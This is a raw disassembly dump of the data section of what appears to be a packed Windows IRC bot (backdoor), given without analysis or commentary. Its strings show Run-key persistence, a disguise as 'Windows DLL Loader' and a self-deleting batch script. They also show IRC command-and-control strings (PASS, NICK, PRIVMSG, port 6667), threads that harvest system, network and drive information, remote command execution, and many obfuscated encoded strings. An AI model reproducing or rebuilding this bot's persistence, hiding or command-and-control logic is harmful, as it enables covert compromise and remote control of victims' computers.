aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset dword_418DD0 ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
off_418B8C dd offset dword_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset dword_418D98
dd offset dword_418DA8
dd offset dword_418D88
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset dword_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset dword_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset loc_418C9C
dd offset aKZdzvlUU ; "Γ"
dd offset aKZdJssgEudaFts ; "葃ԥÔ☘"
dd offset dword_418C5C
dd offset aKZdJssgEudaFts ; "葃ԥÔ☘"
dd offset dword_418C4C
dd offset aIdbLsRLtuiGiXu ; "۶Ë➉塀Ŝ"
dd offset byte_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 9ABAABB4h, 0AEBBA7A7h, 98FFD6B6h, 0C89BB2E3h, 0ADF9B69Ch
; DATA XREF: UPX1:00418BE4�o
dd 0A7B8A4B0h, 0C493B0h, 0
byte_418C10 db 90h ; DATA XREF: UPX1:00418BE0�o
db 0A7h, 0A1h, 98h
dd 0ADA6BBA4h, 93CE93ECh, 2 dup(0)
aIdbLsRLtuiGiXu db '۶Ë➉塀Ŝ',0 ; DATA XREF: UPX1:00418BDC�o
align 4
dd 0
dword_418C4C dd 9BBEAE98h, 0ADACB1E6h, 2 dup(0)dword_418C5C dd 87B6B28Ah, 0E6A2A781h, 0D38EA7h, 0aKZdJssgEudaFts db '葃ԥÔ☘',0 ; DATA XREF: UPX1:00418BCC�o
; UPX1:00418BD4�o
align 8
aKZdzvlUU db 'Γ',0 ; DATA XREF: UPX1:00418BC8�o
align 4
dd 0
; ---------------------------------------------------------------------------
loc_418C9C: ; DATA XREF: UPX1:00418BC4�o
scasb
stosd
mov bh, 8Ch
cmpsd
mov ds:938CE8A7h, eax
retn 0F881h
; ---------------------------------------------------------------------------
db 0A5h, 82h, 86h
dd 8DABABBFh, 0A4B8B5BFh, 2 dup(0)
dword_418CBC dd 8DABAB9Fh, 0A4B8B5BFh, 93CE93ECh, 2 dup(0)dword_418CD0 dd 89B7ABAEh, 89F4A4A5h, 82D893A5h, 2 dup(0)dword_418CE4 dd 89B7AB8Eh, 0ADFAA4A5h, 93BAh, 0dword_418CF4 dd 8CB7ABAEh, 0E8A7A3A7h, 9AC68E87h, 0D48CA5F8h, 2 dup(0)
; DATA XREF: UPX1:00418BB4�o
dword_418D0C dd 84A9BA9Ch, 0BAB1A6A7h, 93CE93ECh, 2 dup(0)dword_418D20 dd 0A1B7AB8Eh, 0A6BBB3A7h, 93CE93ECh, 2 dup(0)dword_418D34 dd 8CB7ABAEh, 0E8A7A3A7h, 99D1998Eh, 0D6A8F7F9h, 8BB0AE89h
; DATA XREF: UPX1:00418BA4�o
; UPX1:00418BAC�o
dd 0A7BDA0A9h, 0ACh, 0
dword_418D54 dd 87BEAD95h, 0B0B1FAA6h, 0A7h, 0dword_418D64 dd 8DB0AEBAh, 9BF4A0A6h, 93C084A7h, 0D3BBF7E5h, 85B0B697h
; DATA XREF: UPX1:00418B9C�o
dd 0BA84F4ADh, 85D395ADh, 0E4h, 0
dword_418D88 dd 9BABB19Ah, 0ADACB1E6h, 2 dup(0)dword_418D98 dd 9BB8B1B0h, 0B0B1FABBh, 0A7h, 0dword_418DA8 dd 89BAADB5h, 0AD87F4A4h, 9FC483A1h, 0E7C9AEE3h, 87B1B68Ch
; DATA XREF: UPX1:off_418B8C�o
; UPX1:00418B94�o
dd 0B1A0BDBAh, 84D3A5E2h, 0C38ABEE1h, 2 dup(0)
dword_418DD0 dd 89AAB195h, 0B0B1FABBh, 0A7h, 0dword_418DE0 dd 293Ah dword_418DE4 dd 5Ch ; sub_406AE7+1B�o ...
dword_418DE8 dd 7078655Ch, 65726F6Ch, 78652E72h, 65haSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_40732D+115�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_418EEC dd 6A657220h, 65746365h, 64hdword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40764D+6A�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; sub_407928+96�o ...
dword_418F50 dd 30h ; sub_40CA29+13D�o ...
dword_418F54 dd 252E7325h, 73252E73h, 73252Eh ; sub_40806A+BD�o
dword_418F60 dd 0C6B7B194h, 0B9BBABh, 0dword_418F6C dd 0C6AEB58Eh, 0BAA6B1BCh, 99D5D8A3h, 0D48BF9FAh, 2 dup(0)
; DATA XREF: sub_408887+14�o
dword_418F84 dd 0C6B7B194h, 0B1ACh, 0dword_418F90 dd 85ACA39Dh, 0BCB1BAE6h, 2 dup(0)dword_418FA0 dd 8FB6AD9Eh, 0A9FAB1A4h, 0A7h, 0dword_418FB0 dd 8DB7AB97h, 0E6BAA7A5h, 0D8DB99A1h, 0A2F6h, 0off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset dword_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 86AEAD9Dh, 0ACB5BBA4h, 9BD791ECh, 0DFC7A4F2h, 87B6AA98h
; DATA XREF: UPX1:00418FD8�o
dd 0A5BBB7E6h, 9BD791EDh, 0C2C6A4F2h, 84B7B596h, 0E7B0B5A7h
dd 98D19FB1h, 0D6C6B3F2h, 89BAB296h, 0A9ADFBB8h, 0A9D999AAh
dd 0C383B2F5h, 8DB5A78Eh, 0BC8BE6ACh, 0C79BC7AFh, 0C391B2B9h
dd 2 dup(0)
dword_41903C dd 8FF7B18Ch, 0BBB1B9A9h, 9FCFD8F3h, 0C5C7B0FAh, 0AF96h
; DATA XREF: UPX1:00418FD4�o
dd 0
dword_419054 dd 86AEAD9Dh, 0ACB5BBA4h, 0C799C5EDh, 95C6B1B8h, 0D9EDA4C8h
; DATA XREF: UPX1:00418FD0�o
dd 0E5E3E6FCh, 9382C6FAh, 0C0D1E3BAh, 8BE1EFC0h, 0FDF9ECF9h
dd 0CFD2C7A3h, 9EDCB5A4h, 0C7BCF1CCh, 0BBB5A7A5h, 0D8D598BBh
dd 8CAFF2h, 0
dword_419098 dd 86AEAD9Dh, 0ACB5BBA4h, 95DF9BECh, 0C99AB8E5h, 8BF7B69Fh
; DATA XREF: UPX1:00418FCC�o
dd 0B9A7h, 0
dword_4190B4 dd 89ADA39Dh, 0E7BAB1E7h, 0D9D19FA0h, 0D49BA2F4h, 0C7ADAC9Ch
; DATA XREF: UPX1:off_418FC8�o
dd 0AFBBBB8Fh, 99E293AEh, 0C78BBBF8h, 9BB78B8Bh, 0A4B8B5BCh
dd 939884A7h, 0B2EFh, 0
dword_4190E8 dd 84B6AD8Dh, 0E6A6B5AAh, 91D999A5h, 0C5C7B2FBh, 0AF96h
; DATA XREF: UPX1:off_418FC4�o
dd 0
off_419100 dd offset loc_415353+2 ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4083AD+3CE�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; sub_4083AD:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4083AD+2D2�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4083AD+296�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083AD:loc_4085EB�o
; sub_408B30:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_4083AD+232�o
; sub_408B30+178�o ...
a2003 db '2003',0 ; DATA XREF: sub_4083AD+1FF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4083AD+1E1�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4083AD+1C3�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4083AD+1A5�o
align 4
a98 db '98',0 ; DATA XREF: sub_4083AD+187�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4083AD+166�o
align 4
a95 db '95',0 ; DATA XREF: sub_4083AD+153�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4083AD+12E�o
align 10h
a?: ; DATA XREF: sub_4083AD+124�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_408B30+2D4�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_408B30+1F9�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_408B30+1E3�o
aBad db 'Bad',0 ; DATA XREF: sub_408B30+1CD�o
aLan db 'LAN',0 ; DATA XREF: sub_408B30:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: sub_408B30+14D�o
align 10h
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_408B30+F5�o
; sub_408B30+108�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; sub_408F2E+4E�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_408F2E+270�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_408F2E+1C5�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; sub_408F2E+24A�o
aUnknown db 'unknown',0 ; DATA XREF: sub_408F2E:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_408F2E+F6�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_408F2E+E4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: sub_408F2E+D2�o
align 4
aFixed db 'fixed',0 ; DATA XREF: sub_408F2E+C0�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: sub_408F2E+AE�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_408F2E+2E�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4093B6+98�o
; sub_4094E6+93�o
align 10h
aBtg db 'btg',0 ; DATA XREF: sub_4093B6+93�o
dword_419474 dd 3430032Dh, 62656402h, 2036775haBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0dword_4194CC dd 3430032Dh, 2037802haNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_409AD5+3A�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_409DD0+3A3�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+37F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+32F�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_409DD0:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD0+80�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD0+6A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD0:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_409DD0+34�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h dword_419660 dd 0A0D7325h, 0 dword_419668 dd 3334h dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40A4A4+44�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 81B6AA8Eh, 0BAB5FABBh, 989898ABh, 0A3F2h, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 29F60h align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 3351E90h dd 2 dup(0)
dword_419788 dd 3290h align 10h
dword_419790 dd 2C45458h dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 51F0B7A1h dd 3 dup(0)
dword_4197B4 dd 26C8CE80h align 10h
dword_4197C0 dd 26B60h align 8
dword_4197C8 dd 2C684E80h dd 2 dup(0)
dword_4197D4 dd 2C558h dd 0
dword_4197DC dd 29E403A0h dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 17408308h dd 2 dup(0)
dword_419818 dd 172A8h align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 0B2ECE0h dd 2 dup(0)
dword_419844 dd 2343003h, 2037325haHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
align 4
dword_419898 dd 465F10ECh dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 11BA18h align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 16A18h dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 0E3E403A8h dd 3 dup(0)
dword_41999C dd 546C2A8h dd 2 dup(0)
dword_4199A8 dd 4618h align 10h
dword_4199B0 dd 0A42278h dd 2 dup(0)
dword_4199BC dd 2A860h dd 0
dword_4199C4 dd 56EC267Eh dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 137128h align 10h
dword_419A10 dd 23901E20h dd 2 dup(0)
dword_419A1C dd 15E10h dd 0
dword_419A24 dd 0A2C60h align 10h
dword_419A30 dd 74A60h dd 2 dup(0)
dword_419A3C dd 45444F4Dh, 732520hdword_419A44 dd 159790h align 10h
dword_419A50 dd 0D5919B11h align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
dword_419A7C dd 5136F8h dd 2 dup(0)
dword_419A88 dd 221F8h align 10h
dword_419A90 dd 50C1B50h dd 2 dup(0)
dword_419A9C dd 2C338h dd 0
dword_419AA4 dd 0B04290h align 10h
dword_419AB0 dd 54524150h, 732520hdword_419AB8 dd 14FE20h dd 2 dup(0)
dword_419AC4 dd 11AA88h align 10h
dword_419AD0 dd 4E494F4Ah, 20732520h, 7325h ; sub_40A9CF+10FA�o ...
dword_419ADC dd 146288h dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 4729D50h dd 2 dup(0)
dword_419B08 dd 56EB58h dd 2 dup(0)
dword_419B14 dd 5F3750h align 10h
dword_419B20 dd 423C479Ah align 10h
dword_419B30 dd 23410B60h dd 2 dup(0)
dword_419B3C dd 9815D395h dd 3 dup(0)
dword_419B4C dd 4698D60h dd 2 dup(0)
dword_419B58 dd 10DA78h dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 77400328h dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
dword_419BA4 dd 512EA0h align 10h
aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 20EA0h align 8
dword_419BE8 dd 65782209h dd 3 dup(0)
dword_419BF8 dd 109E96E7h dd 4 dup(0)
dword_419C0C dd 0A4053CD8h dd 3 dup(0)
dword_419C1C dd 162208h dd 2 dup(0)
dword_419C28 dd 0C17A208h dd 2 dup(0)
dword_419C34 dd 4CF2208h align 10h
dword_419C40 dd 1480A660h dd 2 dup(0)
dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0dword_419C5C dd 4B90h dd 0
dword_419C64 dd 155864D8h align 10h
dword_419C70 dd 22D988A0h dd 2 dup(0)
dword_419C7C dd 22DEDA78h dd 2 dup(0)
dword_419C88 dd 0E53CCCE8h dd 3 dup(0)
dword_419C98 dd 0E53CD300h dd 3 dup(0)
dword_419CA8 dd 5561C7F9h dd 3 dup(0)
dword_419CB8 dd 67270B61h dd 3 dup(0)
dword_419CC8 dd 1520A0h dd 2 dup(0)
dword_419CD4 dd 0AE1FF760h dd 3 dup(0)
dword_419CE4 dd 2BAFD860h align 10h
dword_419CF0 dd 15D698h dd 2 dup(0)
dword_419CFC dd 0B8650h dd 2 dup(0)
dword_419D08 dd 4A38h align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0dword_419D78 dd 2333003h, 2034B4Fh, 0dword_419D84 dd 8Ah, 0 dword_419D8C dd 0CD818BACh, 8196F4BDh, 0D6C3D39Ah, 0FDD3F9B9h, 0C8AAE7D9h
; DATA XREF: sub_40A9CF+790�o
dd 0E6FAEE95h, 0D8C5D3E2h, 2 dup(0)
dword_419DB0 dd 2E78970h dd 2 dup(0)
dword_419DBC dd 0B7B3F8D0h dd 3 dup(0)
dword_419DCC dd 0C2C28390h dd 3 dup(0)
dword_419DDC dd 0AE9D81BBh, 839E9C8Fh, 0A4E7A68Fh, 0FEBE81C3h, 0DCEAF0A0h
; DATA XREF: sub_40A9CF+534�o
dd 0F1ECE3FEh, 2 dup(0)
dword_419DFC dd 81BEABBDh, 98B8B5BCh, 83D299B0h, 0E2A0A3F4h, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
aKnqQxjnuXxQEBZ db 'ߕ帚ɟËӋ٘',0
; DATA XREF: sub_40A9CF+437�o
align 8
dword_419E48 dd 1FD30h align 10h
dword_419E50 dd 67294FA1h align 10h
dword_419E60 dd 67265A79h align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 14705160h dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h dword_419EC4 dd 176C5160h align 10h
dword_419ED0 dd 0AF99D8h dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 1D17950h dd 2 dup(0)
dword_419F04 dd 4B43494Eh, 732520h ; sub_40A9CF+EF�o ...
dword_419F0C dd 146E00h dd 2 dup(0)
dword_419F18 dd 1A80A5D1h dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_40C93C+88�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: sub_40C93C+30�o
; sub_40C93C+B5�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 dword_41A03C dd 7373656Dh, 20656761h, 0dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
